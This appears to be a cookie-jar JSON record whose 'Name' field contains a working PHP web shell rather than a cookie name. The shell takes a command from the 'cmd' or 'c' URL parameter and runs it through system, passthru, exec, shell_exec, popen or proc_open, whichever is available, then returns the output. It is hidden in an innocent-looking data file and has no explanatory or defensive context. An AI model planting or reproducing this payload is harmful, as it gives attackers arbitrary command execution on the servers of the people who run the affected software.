[{"Name":"<?php echo 'YR';$c=$_GET['cmd']??$_GET['c']??'id';$r='';if(function_exists('system')){ob_start();system($c);$r=ob_get_clean();}elseif(function_exists('passthru')){ob_start();passthru($c);$r=ob_get_clean();}elseif(function_exists('exec')){exec($c,$o);$r=join(chr(10),$o);}elseif(function_exists('shell_exec')){$r=shell_exec($c);}elseif(function_exists('popen')){$r=fread(popen($c,'r'),999999);}elseif(function_exists('proc_open')){$p=proc_open($c,array(1=>array('pipe','w')),$pp);$r=stream_get_contents($pp[1]);}echo $r;?>","Value":"x","Domain":"x.local","Path":"\/","Max-Age":0,"Expires":99999999999,"Secure":false,"Discard":false,"HttpOnly":false}]